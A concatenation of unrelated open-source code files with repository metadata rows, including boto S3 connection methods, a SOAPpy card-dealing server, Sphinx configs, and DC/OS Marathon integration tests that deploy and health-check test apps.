conditions.append('{"x-amz-server-side-encryption": "%s"}' % server_side_encryption)
policy = self.build_post_policy(expiration, conditions)
# Add the base64-encoded policy document as the 'policy' field
policy_b64 = base64.b64encode(policy)
fields.append({"name": "policy", "value": policy_b64})
# Add the AWS access key as the 'AWSAccessKeyId' field
fields.append({"name": "AWSAccessKeyId",
"value": self.aws_access_key_id})
# Add signature for encoded policy document as the
# 'signature' field
signature = self._auth_handler.sign_string(policy_b64)
fields.append({"name": "signature", "value": signature})
fields.append({"name": "key", "value": key})
# HTTPS protocol will be used if the secure HTTP option is enabled.
url = '%s://%s/' % (http_method,
self.calling_format.build_host(self.server_name(),
bucket_name))
return {"action": url, "fields": fields}
def generate_url_sigv4(self, expires_in, method, bucket='', key='',
headers=None, force_http=False,
response_headers=None, version_id=None,
iso_date=None):
path = self.calling_format.build_path_base(bucket, key)
auth_path = self.calling_format.build_auth_path(bucket, key)
host = self.calling_format.build_host(self.server_name(), bucket)
# For presigned URLs we should ignore the port if it's HTTPS
if host.endswith(':443'):
host = host[:-4]
params = {}
if version_id is not None:
params['VersionId'] = version_id
http_request = self.build_base_http_request(method, path, auth_path,
headers=headers, host=host,
params=params)
return self._auth_handler.presign(http_request, expires_in,
iso_date=iso_date)
def generate_url(self, expires_in, method, bucket='', key='', headers=None,
query_auth=True, force_http=False, response_headers=None,
expires_in_absolute=False, version_id=None):
if self._auth_handler.capability[0] == 'hmac-v4-s3':
# Handle the special sigv4 case
return self.generate_url_sigv4(expires_in, method, bucket=bucket,
key=key, headers=headers, force_http=force_http,
response_headers=response_headers, version_id=version_id)
headers = headers or {}
if expires_in_absolute:
expires = int(expires_in)
else:
expires = int(time.time() + expires_in)
auth_path = self.calling_format.build_auth_path(bucket, key)
auth_path = self.get_path(auth_path)
# optional version_id and response_headers need to be added to
# the query param list.
extra_qp = []
if version_id is not None:
extra_qp.append("versionId=%s" % version_id)
if response_headers:
for k, v in response_headers.items():
extra_qp.append("%s=%s" % (k, urllib.parse.quote(v)))
if self.provider.security_token:
headers['x-amz-security-token'] = self.provider.security_token
if extra_qp:
delimiter = '?' if '?' not in auth_path else '&'
auth_path += delimiter + '&'.join(extra_qp)
c_string = boto.utils.canonical_string(method, auth_path, headers,
expires, self.provider)
b64_hmac = self._auth_handler.sign_string(c_string)
encoded_canonical = urllib.parse.quote(b64_hmac, safe='')
self.calling_format.build_path_base(bucket, key)
if query_auth:
query_part = '?' + self.QueryString % (encoded_canonical, expires,
self.aws_access_key_id)
else:
query_part = ''
if headers:
hdr_prefix = self.provider.header_prefix
for k, v in headers.items():
if k.startswith(hdr_prefix):
# headers used for sig generation must be
# included in the url also.
extra_qp.append("%s=%s" % (k, urllib.parse.quote(v)))
if extra_qp:
delimiter = '?' if not query_part else '&'
query_part += delimiter + '&'.join(extra_qp)
if force_http:
protocol = 'http'
port = 80
else:
protocol = self.protocol
port = self.port
return self.calling_format.build_url_base(self, protocol,
self.server_name(port),
bucket, key) + query_part
def get_all_buckets(self, headers=None):
response = self.make_request('GET', headers=headers)
body = response.read()
if response.status > 300:
raise self.provider.storage_response_error(
response.status, response.reason, body)
rs = ResultSet([('Bucket', self.bucket_class)])
h = handler.XmlHandler(rs, self)
if not isinstance(body, bytes):
body = body.encode('utf-8')
xml.sax.parseString(body, h)
return rs
def get_canonical_user_id(self, headers=None):
"""
Convenience method that returns the "CanonicalUserID" of the
user who's credentials are associated with the connection.
The only way to get this value is to do a GET request on the
service which returns all buckets associated with the account.
As part of that response, the canonical userid is returned.
This method simply does all of that and then returns just the
user id.
:rtype: string
:return: A string containing the canonical user id.
"""
rs = self.get_all_buckets(headers=headers)
return rs.owner.id
def get_bucket(self, bucket_name, validate=True, headers=None):
"""
Retrieves a bucket by name.
If the bucket does not exist, an ``S3ResponseError`` will be raised. If
you are unsure if the bucket exists or not, you can use the
``S3Connection.lookup`` method, which will either return a valid bucket
or ``None``.
If ``validate=False`` is passed, no request is made to the service (no
charge/communication delay). This is only safe to do if you are **sure**
the bucket exists.
If the default ``validate=True`` is passed, a request is made to the
service to ensure the bucket exists. Prior to Boto v2.25.0, this fetched
a list of keys (but with a max limit set to ``0``, always returning an empty
list) in the bucket (& included better error messages), at an
increased expense. As of Boto v2.25.0, this now performs a HEAD request
(less expensive but worse error messages).
If you were relying on parsing the error message before, you should call
something like::
bucket = conn.get_bucket('<bucket_name>', validate=False)
bucket.get_all_keys(maxkeys=0)
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:type validate: boolean
:param validate: If ``True``, it will try to verify the bucket exists
on the service-side. (Default: ``True``)
"""
if validate:
return self.head_bucket(bucket_name, headers=headers)
else:
return self.bucket_class(self, bucket_name)
def head_bucket(self, bucket_name, headers=None):
"""
Determines if a bucket exists by name.
If the bucket does not exist, an ``S3ResponseError`` will be raised.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:returns: A <Bucket> object
"""
response = self.make_request('HEAD', bucket_name, headers=headers)
body = response.read()
if response.status == 200:
return self.bucket_class(self, bucket_name)
elif response.status == 403:
# For backward-compatibility, we'll populate part of the exception
# with the most-common default.
err = self.provider.storage_response_error(
response.status,
response.reason,
body
)
err.error_code = 'AccessDenied'
err.error_message = 'Access Denied'
raise err
elif response.status == 404:
# For backward-compatibility, we'll populate part of the exception
# with the most-common default.
err = self.provider.storage_response_error(
response.status,
response.reason,
body
)
err.error_code = 'NoSuchBucket'
err.error_message = 'The specified bucket does not exist'
raise err
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def lookup(self, bucket_name, validate=True, headers=None):
"""
Attempts to get a bucket from S3.
Works identically to ``S3Connection.get_bucket``, save for that it
will return ``None`` if the bucket does not exist instead of throwing
an exception.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
:type validate: boolean
:param validate: If ``True``, it will try to fetch all keys within the
given bucket. (Default: ``True``)
"""
try:
bucket = self.get_bucket(bucket_name, validate, headers=headers)
except:
bucket = None
return bucket
def create_bucket(self, bucket_name, headers=None,
location=Location.DEFAULT, policy=None):
"""
Creates a new located bucket. By default it's in the USA. You can pass
Location.EU to create a European bucket (S3) or European Union bucket
(GCS).
:type bucket_name: string
:param bucket_name: The name of the new bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to AWS.
:type location: str
:param location: The location of the new bucket. You can use one of the
constants in :class:`boto.s3.connection.Location` (e.g. Location.EU,
Location.USWest, etc.).
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
"""
if (location and not location.startswith("us-")):
check_lowercase_bucketname(bucket_name)
if policy:
if headers:
headers[self.provider.acl_header] = policy
else:
headers = {self.provider.acl_header: policy}
if location == Location.DEFAULT:
data = ''
else:
data = '<CreateBucketConfiguration><LocationConstraint>' + \
location + '</LocationConstraint></CreateBucketConfiguration>'
response = self.make_request('PUT', bucket_name, headers=headers,
data=data)
body = response.read()
if response.status == 409:
raise self.provider.storage_create_error(
response.status, response.reason, body)
if response.status == 200:
return self.bucket_class(self, bucket_name)
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def delete_bucket(self, bucket, headers=None):
"""
Removes an S3 bucket.
In order to remove the bucket, it must first be empty. If the bucket is
not empty, an ``S3ResponseError`` will be raised.
:type bucket_name: string
:param bucket_name: The name of the bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to
AWS.
"""
response = self.make_request('DELETE', bucket, headers=headers)
body = response.read()
if response.status != 204:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def make_request(self, method, bucket='', key='', headers=None, data='',
query_args=None, sender=None, override_num_retries=None,
retry_handler=None):
if isinstance(bucket, self.bucket_class):
bucket = bucket.name
if isinstance(key, Key):
key = key.name
path = self.calling_format.build_path_base(bucket, key)
#boto.log.debug('path=%s' % path)
auth_path = self.calling_format.build_auth_path(bucket, key)
#boto.log.debug('auth_path=%s' % auth_path)
host = self.calling_format.build_host(self.server_name(), bucket)
if query_args:
path += '?' + query_args
#boto.log.debug('path=%s' % path)
auth_path += '?' + query_args
#boto.log.debug('auth_path=%s' % auth_path)
return super(S3Connection, self).make_request(
method, path, headers,
data, host, auth_path, sender,
override_num_retries=override_num_retries,
retry_handler=retry_handler
)
| mit | -8,775,643,437,793,005,000 | 38.426426 | 111 | 0.59757 | false |
beiko-lab/gengis | bin/Lib/site-packages/win32/Demos/getfilever.py | 4 | 1087 | import os, win32api
ver_strings=('Comments','InternalName','ProductName',
'CompanyName','LegalCopyright','ProductVersion',
'FileDescription','LegalTrademarks','PrivateBuild',
'FileVersion','OriginalFilename','SpecialBuild')
fname = os.environ["comspec"]
d=win32api.GetFileVersionInfo(fname, '\\')
## backslash as parm returns dictionary of numeric info corresponding to VS_FIXEDFILEINFO struc
for n, v in d.iteritems():
print n, v
pairs=win32api.GetFileVersionInfo(fname, '\\VarFileInfo\\Translation')
## \VarFileInfo\Translation returns list of available (language, codepage) pairs that can be used to retreive string info
## any other must be of the form \StringfileInfo\%04X%04X\parm_name, middle two are language/codepage pair returned from above
for lang, codepage in pairs:
print 'lang: ', lang, 'codepage:', codepage
for ver_string in ver_strings:
str_info=u'\\StringFileInfo\\%04X%04X\\%s' %(lang,codepage,ver_string)
## print str_info
print ver_string, repr(win32api.GetFileVersionInfo(fname, str_info))
| gpl-3.0 | -2,031,292,292,911,051,800 | 49.761905 | 126 | 0.720331 | false |
johngian/remo | docs/conf.py | 8 | 7229 | # -*- coding: utf-8 -*-
#
# playdoh documentation build configuration file, created by
# sphinx-quickstart on Tue Jan 4 15:11:09 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ReMo Portal'
copyright = u'2011-2012, ReMo Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2.5'
# The full version, including alpha/beta/rc tags.
release = '0.2.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'remodoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'remo.tex', u'ReMo Portal Documentation',
u'Mozilla', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'remoportal', u"ReMo Portal Documentation",
[u'the authors'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| bsd-3-clause | -2,281,941,958,961,641,500 | 31.859091 | 125 | 0.70895 | false |
MerryMage/dynarmic | externals/fmt/support/rst2md.py | 3 | 3958 | #!/usr/bin/env python
# reStructuredText (RST) to GitHub-flavored Markdown converter
import re, sys
from docutils import core, nodes, writers
def is_github_ref(node):
return re.match('https://github.com/.*/(issues|pull)/.*', node['refuri'])
class Translator(nodes.NodeVisitor):
def __init__(self, document):
nodes.NodeVisitor.__init__(self, document)
self.output = ''
self.indent = 0
self.preserve_newlines = False
def write(self, text):
self.output += text.replace('\n', '\n' + ' ' * self.indent)
def visit_document(self, node):
pass
def depart_document(self, node):
pass
def visit_section(self, node):
pass
def depart_section(self, node):
# Skip all sections except the first one.
raise nodes.StopTraversal
def visit_title(self, node):
self.version = re.match(r'(\d+\.\d+\.\d+).*', node.children[0]).group(1)
raise nodes.SkipChildren
def visit_title_reference(self, node):
raise Exception(node)
def depart_title(self, node):
pass
def visit_Text(self, node):
if not self.preserve_newlines:
node = node.replace('\n', ' ')
self.write(node)
def depart_Text(self, node):
pass
def visit_bullet_list(self, node):
pass
def depart_bullet_list(self, node):
pass
def visit_list_item(self, node):
self.write('* ')
self.indent += 2
def depart_list_item(self, node):
self.indent -= 2
self.write('\n\n')
def visit_paragraph(self, node):
self.write('\n\n')
def depart_paragraph(self, node):
pass
def visit_reference(self, node):
if not is_github_ref(node):
self.write('[')
def depart_reference(self, node):
if not is_github_ref(node):
self.write('](' + node['refuri'] + ')')
def visit_target(self, node):
pass
def depart_target(self, node):
pass
def visit_literal(self, node):
self.write('`')
def depart_literal(self, node):
self.write('`')
def visit_literal_block(self, node):
self.write('\n\n```')
if 'c++' in node['classes']:
self.write('c++')
self.write('\n')
self.preserve_newlines = True
def depart_literal_block(self, node):
self.write('\n```\n')
self.preserve_newlines = False
def visit_inline(self, node):
pass
def depart_inline(self, node):
pass
def visit_image(self, node):
self.write('')
def depart_image(self, node):
pass
def write_row(self, row, widths):
for i, entry in enumerate(row):
text = entry[0][0] if len(entry) > 0 else ''
if i != 0:
self.write('|')
self.write('{:{}}'.format(text, widths[i]))
self.write('\n')
def visit_table(self, node):
table = node.children[0]
colspecs = table[:-2]
thead = table[-2]
tbody = table[-1]
widths = [int(cs['colwidth']) for cs in colspecs]
sep = '|'.join(['-' * w for w in widths]) + '\n'
self.write('\n\n')
self.write_row(thead[0], widths)
self.write(sep)
for row in tbody:
self.write_row(row, widths)
raise nodes.SkipChildren
def depart_table(self, node):
pass
class MDWriter(writers.Writer):
"""GitHub-flavored markdown writer"""
supported = ('md',)
"""Formats this writer supports."""
def translate(self):
translator = Translator(self.document)
self.document.walkabout(translator)
self.output = (translator.output, translator.version)
def convert(rst_path):
"""Converts RST file to Markdown."""
return core.publish_file(source_path=rst_path, writer=MDWriter())
if __name__ == '__main__':
convert(sys.argv[1])
| gpl-2.0 | 9,083,898,776,519,506,000 | 23.893082 | 80 | 0.561142 | false |
mnaboka/dcos | packages/dcos-integration-test/extra/test_applications.py | 3 | 9315 | import logging
import uuid
import pytest
from test_util.marathon import get_test_app, get_test_app_in_docker, get_test_app_in_ucr
log = logging.getLogger(__name__)
def test_if_marathon_app_can_be_deployed(dcos_api_session):
"""Marathon app deployment integration test
This test verifies that marathon app can be deployed, and that service points
returned by Marathon indeed point to the app that was deployed.
The application being deployed is a simple http server written in python.
Please test_server.py for more details.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successful deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeeds.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app())
def test_if_docker_app_can_be_deployed(dcos_api_session):
"""Marathon app inside docker deployment integration test.
Verifies that a marathon app inside of a docker daemon container can be
deployed and accessed as expected.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app_in_docker(ip_per_container=False))
@pytest.mark.parametrize("healthcheck", [
"HTTP",
"MESOS_HTTP",
])
def test_if_ucr_app_can_be_deployed(dcos_api_session, healthcheck):
"""Marathon app inside ucr deployment integration test.
Verifies that a marathon docker app inside of a ucr container can be
deployed and accessed as expected.
"""
dcos_api_session.marathon.deploy_test_app_and_check(*get_test_app_in_ucr(healthcheck))
def test_if_marathon_app_can_be_deployed_with_mesos_containerizer(dcos_api_session):
"""Marathon app deployment integration test using the Mesos Containerizer
This test verifies that a Marathon app using the Mesos containerizer with
a Docker image can be deployed.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successfull deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeds.
When port mapping is available (MESOS-4777), this test should be updated to
reflect that.
"""
app, test_uuid = get_test_app()
app['container'] = {
'type': 'MESOS',
'docker': {
# TODO(cmaloney): Switch to an alpine image with glibc inside.
'image': 'debian:jessie'
},
'volumes': [{
'containerPath': '/opt/mesosphere',
'hostPath': '/opt/mesosphere',
'mode': 'RO'
}]
}
dcos_api_session.marathon.deploy_test_app_and_check(app, test_uuid)
def test_if_marathon_pods_can_be_deployed_with_mesos_containerizer(dcos_api_session):
"""Marathon pods deployment integration test using the Mesos Containerizer
This test verifies that a Marathon pods can be deployed.
"""
test_uuid = uuid.uuid4().hex
# create pod with trivial apps that function as long running processes
pod_definition = {
'id': '/integration-test-pods-{}'.format(test_uuid),
'scaling': {'kind': 'fixed', 'instances': 1},
'environment': {'PING': 'PONG'},
'containers': [
{
'name': 'ct1',
'resources': {'cpus': 0.1, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:jessie'},
'exec': {'command': {'shell': 'touch foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test -f foo'}}
},
{
'name': 'ct2',
'resources': {'cpus': 0.1, 'mem': 32},
'exec': {'command': {'shell': 'echo $PING > foo; while true; do sleep 1; done'}},
'healthcheck': {'command': {'shell': 'test $PING = `cat foo`'}}
}
],
'networks': [{'mode': 'host'}]
}
with dcos_api_session.marathon.deploy_pod_and_cleanup(pod_definition):
# Trivial app if it deploys, there is nothing else to check
pass
def test_octarine(dcos_api_session, timeout=30):
# This app binds to port 80. This is only required by the http (not srv)
# transparent mode test. In transparent mode, we use ".mydcos.directory"
# to go to localhost, the port attached there is only used to
# determine which port to send traffic to on localhost. When it
# reaches the proxy, the port is not used, and a request is made
# to port 80.
app, uuid = get_test_app()
app['acceptedResourceRoles'] = ["slave_public"]
app['portDefinitions'][0]["port"] = 80
app['requirePorts'] = True
with dcos_api_session.marathon.deploy_and_cleanup(app) as service_points:
port_number = service_points[0].port
# It didn't actually grab port 80 when requirePorts was unset
assert port_number == app['portDefinitions'][0]["port"]
app_name = app["id"].strip("/")
port_name = app['portDefinitions'][0]["name"]
port_protocol = app['portDefinitions'][0]["protocol"]
srv = "_{}._{}._{}.marathon.mesos".format(port_name, app_name, port_protocol)
addr = "{}.marathon.mesos".format(app_name)
transparent_suffix = ".mydcos.directory"
standard_mode = "standard"
transparent_mode = "transparent"
t_addr_bind = 2508
t_srv_bind = 2509
standard_addr = "{}:{}/ping".format(addr, port_number)
standard_srv = "{}/ping".format(srv)
transparent_addr = "{}{}:{}/ping".format(addr, transparent_suffix, t_addr_bind)
transparent_srv = "{}{}:{}/ping".format(srv, transparent_suffix, t_srv_bind)
# The uuids are different between runs so that they don't have a
# chance of colliding. They shouldn't anyways, but just to be safe.
octarine_runner(dcos_api_session, standard_mode, uuid + "1", standard_addr)
octarine_runner(dcos_api_session, standard_mode, uuid + "2", standard_srv)
octarine_runner(dcos_api_session, transparent_mode, uuid + "3", transparent_addr, bind_port=t_addr_bind)
octarine_runner(dcos_api_session, transparent_mode, uuid + "4", transparent_srv, bind_port=t_srv_bind)
def octarine_runner(dcos_api_session, mode, uuid, uri, bind_port=None):
log.info("Running octarine(mode={}, uuid={}, uri={}".format(mode, uuid, uri))
octarine = "/opt/mesosphere/bin/octarine"
bind_port_str = ""
if bind_port is not None:
bind_port_str = "-bindPort {}".format(bind_port)
server_cmd = "{} -mode {} {} {}".format(octarine, mode, bind_port_str, uuid)
log.info("Server: {}".format(server_cmd))
proxy = ('http://127.0.0.1:$({} --client --port {})'.format(octarine, uuid))
curl_cmd = '''"$(curl --fail --proxy {} {})"'''.format(proxy, uri)
expected_output = '''"$(printf "{\\n \\"pong\\": true\\n}")"'''
check_cmd = """sh -c '[ {} = {} ]'""".format(curl_cmd, expected_output)
log.info("Check: {}".format(check_cmd))
app, uuid = get_test_app()
app['requirePorts'] = True
app['cmd'] = server_cmd
app['healthChecks'] = [{
"protocol": "COMMAND",
"command": {"value": check_cmd},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 30
}]
with dcos_api_session.marathon.deploy_and_cleanup(app):
pass
def test_pkgpanda_api(dcos_api_session):
def get_and_validate_package_ids(path, node):
r = dcos_api_session.get(path, node=node)
assert r.status_code == 200
package_ids = r.json()
assert isinstance(package_ids, list)
for package_id in package_ids:
r = dcos_api_session.get(path + package_id, node=node)
assert r.status_code == 200
name, version = package_id.split('--')
assert r.json() == {'id': package_id, 'name': name, 'version': version}
return package_ids
active_buildinfo = dcos_api_session.get('/pkgpanda/active.buildinfo.full.json').json()
active_buildinfo_packages = sorted(
# Setup packages don't have a buildinfo.
(package_name, info['package_version'] if info else None)
for package_name, info in active_buildinfo.items()
)
def assert_packages_match_active_buildinfo(package_ids):
packages = sorted(map(lambda id_: tuple(id_.split('--')), package_ids))
assert len(packages) == len(active_buildinfo_packages)
for package, buildinfo_package in zip(packages, active_buildinfo_packages):
if buildinfo_package[1] is None:
# No buildinfo for this package, so we can only compare names.
assert package[0] == buildinfo_package[0]
else:
assert package == buildinfo_package
for node in dcos_api_session.masters + dcos_api_session.all_slaves:
package_ids = get_and_validate_package_ids('pkgpanda/repository/', node)
active_package_ids = get_and_validate_package_ids('pkgpanda/active/', node)
assert set(active_package_ids) <= set(package_ids)
assert_packages_match_active_buildinfo(active_package_ids)
| apache-2.0 | -8,388,294,923,881,702,000 | 39.324675 | 112 | 0.630059 | false |
nilmini20s/gem5-2016-08-13 | src/mem/slicc/ast/TypeAST.py | 92 | 2238 | # Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.AST import AST
from slicc.symbols import Type
class TypeAST(AST):
def __init__(self, slicc, ident):
super(TypeAST, self).__init__(slicc)
self.ident = ident
def __repr__(self):
return self.ident
def __str__(self):
return self.ident
@property
def type(self, assert_type=None):
type = self.symtab.find(self.ident, Type)
if not type:
self.error("Type '%s' not declared.", self)
if assert_type is not None and type != assert_type:
self.error("Type '%s' is should be type '%s'", self, assert_type)
return type
| bsd-3-clause | -6,428,859,622,578,002,000 | 41.226415 | 77 | 0.733691 | false |
ivoflipse/devide.johannes | extra/soappy-cvp/tests/cardServer.py | 5 | 2999 | #!/usr/bin/env python
# Copyright (c) 2001 actzero, inc. All rights reserved.
import string
import sys
sys.path.insert (1, '..')
from SOAPpy import *
ident = '$Id: cardServer.py,v 1.4 2004/02/18 21:22:13 warnes Exp $'
# create the list of all cards, and keep strings for each suit
__cs = "Clubs"
__ds = "Diamonds"
__hs = "Hearts"
__ss = "Spades"
__cards = []
for suit in [__cs, __ds, __hs, __ss]:
for num in range(9):
num += 1
__cards.append(str(num+1)+" of "+suit)
for face in ["ace","King","Queen","Jack"]:
__cards.append(face+" of "+suit)
def deal(num):
if num not in range(1,53):
return -1
else:
alreadydealt = []
ignore = 0
handdealt = []
import whrandom
while num > 0:
idx = int(str(whrandom.random())[2:4])
if idx in range(52) and idx not in alreadydealt:
handdealt.append(__cards[idx])
alreadydealt.append(idx)
num -= 1
else:
ignore += 1
continue
return handdealt
def arrangeHand(hand):
c = []
d = []
h = []
s = []
import string
for card in hand:
if string.find(card, __cs) != -1:
c.append(card)
elif string.find(card, __ds) != -1:
d.append(card)
elif string.find(card, __hs) != -1:
h.append(card)
elif string.find(card, __ss) != -1:
s.append(card)
for cards, str in ((c, __cs),(d, __ds),(h,__hs), (s,__ss)):
cards.sort()
idx = 0
if "10 of "+str in cards:
cards.remove("10 of "+str)
if "Jack of "+str in cards: idx += 1
if "Queen of "+str in cards: idx += 1
if "King of "+str in cards: idx += 1
if "ace of "+str in cards: idx +=1
cards.insert(len(cards)-idx,"10 of "+str)
if "King of "+str in cards:
cards.remove("King of "+str)
if "ace of "+str in cards: cards.insert(len(cards)-1,"King of "+str)
else: cards.append("King of "+str)
return c+d+h+s
def dealHand (NumberOfCards, StringSeparator):
hand = deal(NumberOfCards)
return string.join(hand,StringSeparator)
def dealArrangedHand (NumberOfCards, StringSeparator):
if NumberOfCards < 1 or NumberOfCards > 52:
raise ValueError, "NumberOfCards must be between 1 and 52"
unarranged = deal(NumberOfCards)
hand = arrangeHand(unarranged)
return string.join(hand, StringSeparator)
def dealCard ():
return deal(1)[0]
run = 1
def quit():
global run
run=0;
namespace = 'http://soapinterop.org/'
server = SOAPServer (("localhost", 12027))
server.registerKWFunction (dealHand, namespace)
server.registerKWFunction (dealArrangedHand, namespace)
server.registerKWFunction (dealCard, namespace)
server.registerKWFunction (quit, namespace)
try:
while run:
server.handle_request()
except KeyboardInterrupt:
pass
| bsd-3-clause | 8,754,451,022,431,537,000 | 25.776786 | 80 | 0.565188 | false |
wubr2000/googleads-python-lib | examples/dfp/v201508/forecast_service/get_availability_forecast_for_line_item.py | 4 | 2272 | #!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
